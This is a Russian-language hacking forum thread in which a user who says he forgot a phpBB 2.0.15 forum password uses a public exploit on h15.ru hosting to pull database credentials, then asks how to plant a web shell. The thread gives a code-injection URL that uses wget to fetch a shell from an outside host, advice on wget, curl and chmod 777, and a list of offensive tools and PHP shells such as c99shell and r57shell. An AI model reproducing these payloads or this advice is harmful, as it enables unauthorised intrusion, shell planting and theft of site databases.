h15 mySQL

Всем привет! Забыл пароль от форума phpbb

заюзал сплойтик, узнал пасс и логин к дб., но адресок к дб мне совсем не понравился, выглядело это вот так

Connecting OK
Sending exploit OK
Database Host: database
Database Name: xxxxxx5
Username: xxxxxx5
Password: xxxxxx5

гугл подсказал мне, что это нормально, т к доступ к mySQL на h15.ru возможен только с локал машины.

Это так???

Далее появилась идея залить с помощью PuttyFTP, скриптик, который копернул бы всю БД.
Но опять столкнулся с проблемой такого содержания, врубил Putty, указал адресок, ввел логин, а вот пасс вводиться не хочет, ни руками, ни копипастом.
Пробывал логиниться через браузер, но натыкаюсь на 403 - Forbidden
Попробывал зарегить, свой сайтик, чтобы протестить Putty на нем, но рега временно в дауне (((
Что здесь может быть не так???
Или просто у них вместе с регой и авторизация в дауне?
И вообще верна ли логика моих действий? или есть способы получше?

 

o.0
Хы тоже высаживался в первые разы...Когда вводишь, он не отображается на экране, ни звездочками, никак.
Тоесть: ввел и жми.

 

Хуже нет, когда пароль не знаешь, да еще и забыл ))

1). Залей шелл. Если смог вытащить пароли к бд, то это не проблема. В нормальном есть функция бекапа базы (хоть с локалхоста)
2). найди на сайте что-то вроде phpmyadmin

P.S. ты указываешь пароли от БД к акку от FTP?

 

Всем огромное спасибо, у меня еще 1 вопрос.
Не знаю о хосте на холме нечего, в мануале ихнем написано

Возможно ли изменить пассы там, т е на фтпшник и mySQL разные поставить?
Просто что то не могу я залогиться на фтп(

насколько я понял, сплойт дает 1 пасс от бд и это наверно от фтп тоже, судя из выше описанного. нет?

 

там и так разные уже...

нет. сплоит тебе вернул пароль от БД. ФТП аккаунт (как и SSH) совсем другой

 

понятно...
В силу слабых знаний, на этом мои гениальные идеи заканчиваются)) Можно еще чтонить сделать, зная только пасс от бд на локалмашине? форум phpbb v2.0.15

 

в третьем сверху сообщении я тебе уже ответил

 

Я не особо знаком с такими методами, я пока литературку полопачу, а ты если сможеш отпишись мне сеня в асю плз.

 

Помогите плз.
phpbb 2.0.15
Вообщем вот что мне удалось узнать

http://site.h15.ru/forum//viewtopic.php?t=&highlight='.phpinfo().'

Put_phpinfo: [/home/b/site.h15.ru/WWW/forum//viewtopic.php]

Смогу ли я залить шелл таким запросом???

http://site.h15/forum/viewtopic.php?&cmd=wget http://shells//fuck.php;&highlight='.eval($HTTP_GET_VARS[cmd]).'

Или нет???
Ответьте плз..

И еще огромная просьба, кто может дать шел, чтобы стибрить всю sql, зная логин и пасс???

Если я не прав, то плз подробно опишите куда, как, что и как потом достать)))

Вообще пробывал заюзать сплойт
http://milw0rm.com/exploits/1076
Не смог, т не знаю какой командой залить шел, оп пристал ко мне с табличкой вида
site.h15.ru/forum/$ а что написать я незнаю....

 

юзай nst shell Вообще на хэ15 дыры же латают я думаю сплойт который есть в паблике врятли поможет

Шелл заливается командой wget http://адресс шела
Главное чтобы в адресе cd была папка с правами на запись
Ну если у тебя есть права на выполнение то можно chmod 777 команду выполнить
ещё есть команды curl -0 ./shell.php http://адресс (вроде так)

 

Кстати на тут есть всякие разные включая nst

Apache Hacking TooLz Directory:

Apache Chunked Scanner
Apache Hacker Tool v 2.0
Apache H4x0r Script


Remote File Inclusion And Remote Command Execution Directory:

IIS 5 Dav Scanner & Exploiter
PHP Attacker
PHP Injection Scanner & Exploiter
XML-RPC Scanner & Exploiter


Databases & SQL Injection & XSS TooLz Directory

Casi 4.0
ForceSQL
Mssql BruteForce TooL
SQL Ping 2
SQL Recon
SQL Vuln Scanner
SQL & XSS TooL

PHP Shells

**** v2.0
c99shell #16
Backdoor php v0.1
r57shell
ajan
casus15
cmd (asp)
CyberEye (asp)
CyberSpy5 (asp)
Indexer (asp)
Ntdaddy (asp)
News Remote PHP Shell Injection
PHP Shell
phpRemoteView
nstview php shell

Скачать с Рапиды

 

Big THX

По теме, вытащил все забытые пароли)
Но другим способом)